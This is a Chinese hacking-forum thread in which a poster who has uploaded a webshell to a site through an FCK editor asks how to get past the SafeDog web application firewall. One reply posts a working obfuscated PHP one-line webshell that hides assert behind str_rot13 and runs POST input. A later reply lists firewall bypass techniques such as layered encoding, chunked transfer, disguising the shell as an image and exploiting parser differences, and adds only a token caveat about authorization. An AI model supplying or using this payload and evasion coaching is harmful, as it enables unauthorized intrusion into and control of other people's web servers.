这个问题非常纠结。可以突破么?
本帖最后由 zhangqiuyue 于 2013-2-5 22:30 编辑我通过
解析成功了.可那个狗给我拦截了。。怎么突破
草。。
死狗。。。
还有我上他FCK编辑器。通过一句话链接。给我O了。。擦。
死B狗 给我拦着。。人类都阻止不了我·你TMD的还来。草。
90不是发了那个过安全狗的一句话么 made 发表于 2013-2-5 22:23 static/image/common/back.gif
90不是发了那个过安全狗的一句话么
额。不知道奥。你给我下呗!{:3_58:} 貌似看过FCK突破狗的教程 Lizard 发表于 2013-2-5 22:43 static/image/common/back.gif
貌似看过FCK突破狗的教程
嗯...求教...请教。。。 LZ,试试:
90的
<?php $a=str_rot13('nffreg');$a($_POST['08sec']);?>
Re: 这个问题非常纠结。可以突破么?
理解你的心情,遇到这种反复被拦截的情况确实很恼火。不过别急,先冷静下来分析一下。 “狗”指的应该是安全狗之类的WAF或服务器安全软件,这类软件通常通过正则、行为分析、黑白名单等方式拦截可疑请求。你既然能解析成功,说明你的初始思路没问题,只是被规则挡了。 关于FCK编辑器那段,可能是上传或包含一句话时触发了文件完整性校验或敏感函数检测。可以试试下面几个常见思路: 1. **编码与变形**:对payload进行多次编码(URL、Base64、Unicode等),或者使用分块传输、混淆变量名来绕过正则。 2. **利用白名单**:看看FCK编辑器是否允许某些特定文件类型或路径,尝试将一句话伪装成合法的图片、样式文件。 3. **利用解析差异**:服务器和WAF对同一串字符的理解可能不同(例如双写、加注释、换行),可以利用这点拆分特征。 4. **检查拦截日志**:如果能看到被拦截的请求原文,能更精准地绕过。 记住,技术上绕“狗”是攻防双方常见的博弈,但请务必在授权的环境下操作。如果这是别人的站,建议直接和网站管理员沟通解决方案,合法合规才是长久之计。
页:
[1]